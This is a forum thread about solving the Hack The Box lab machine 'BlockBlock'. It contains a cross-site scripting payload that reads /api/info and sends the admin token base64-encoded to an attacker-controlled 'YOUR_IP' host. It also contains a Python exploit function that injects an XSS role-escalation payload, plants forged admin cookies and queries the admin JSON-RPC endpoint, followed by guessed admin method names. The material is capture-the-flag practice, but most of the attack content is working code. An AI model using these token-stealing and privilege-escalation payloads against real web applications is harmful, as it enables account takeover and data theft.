Hackthebox - BlockBlock

luadoles · November 16, 2024, 8:30pm

BlockBlock solve

luadoles · November 18, 2024, 10:34pm

xss in Report User:
">

moha1313128 · November 19, 2024, 1:34pm

Improved reliability of bot on box.

Samuel · November 20, 2024, 10:10am

Anyone know how to bypass this issue? {"error":"Proxy Couldn't verify token"}

celikd · November 20, 2024, 1:41pm

You can steal the admin token like this:

fetch('/api/info').then(response => response.text()).then(text => {
    fetch('http://YOUR_IP/log?' + btoa(text), {
        mode: 'no-cors'
    });
});

And with the admin token you can successfully access /admin. From there you will see a endpoint /api/json-rpc

celikd · November 20, 2024, 1:45pm

def do_lol(self, line):
        """
        Exploits a target by injecting a malicious payload and collecting admin information.
        This function performs the following steps:
        1. Logs in to the application with provided credentials.
        2. Injects a malicious payload to elevate the role of a user to 'admin.'
        3. Executes a secondary payload to exfiltrate admin tokens by abusing '/api/info.'
        4. Prepares for further exploitation using '/admin' and '/api/json-rpc'.
        Parameters:
        line (str): Additional parameters for the target.
        Returns:
        None
        """
        rhost = self.params["rhost"]
        url = f'http://{rhost}'
        lhost = self.params["lhost"]

        payload = (
            "<img src=x onerror=\"fetch('/api/update_role', {method: 'POST', headers: { 'Content-Type': 'application/json'}, "
            "body: JSON.stringify({ 'username': 'grisun0', 'role': 'grisun0'})})\" />"
        )
        headers = {
            "Content-Type": "application/json"
        }
        s = requests.Session()
        print_msg(f"Logging in and sending payload to {url}")
        login_response = s.post(f'{url}/api/login', headers=headers, json={"username": "grisun0", "password": "grisun0"})
        if login_response.status_code == 200:
            print_msg("Login successful. Injecting primary payload.")
            s.cookies.set("role", "admin", domain="blockblock.htb", path="/")
            s.cookies.set(
                "token",
                "eyJhbGciOi..............PJK18ySGlcZ_16dt9-UnKeX2fnM",
                domain="blockblock.htb",
                path="/",
            )
            s.cookies.set("username", "admin", domain="blockblock.htb", path="/")
            jwt_secret = {"Authorization": "34fd1a8cb0b16.........bf2a5d3b9"}
            chat_address = "0x1234567890abcdef1234567890abcdef12345678"
            url = f"{url}/api/json-rpc"
            headers = {
                "Content-Type": "application/json",
                "token": jwt_secret["Authorization"],
            }
            payload = {
                "jsonrpc": "2.0",
                "method": f"{line}",
                "params": ["latest", False],
                "id": 1
            }
            print_msg(payload)
            response = s.post(url, headers=headers, json=payload)
            print_msg(response.json())
     
            return

Samuel · November 20, 2024, 2:00pm

Thanks mate, if i may ask, you know what should be {line} replaced with?

celikd · November 20, 2024, 2:22pm

The {line} parameter in the payload for the JSON-RPC request is where you specify the method you want to call on the target API. This value depends on the available methods provided by the target’s JSON-RPC API and what you aim to achieve. Here are some possibilities based on typical JSON-RPC APIs:

Common Admin Methods:

"getAdminInfo": If you want to retrieve admin-related information.
"listUsers": To get a list of users in the application.
"updateSettings": To modify application settings.
"deleteUser": To delete a specific user.
"resetPassword": To reset an account’s password.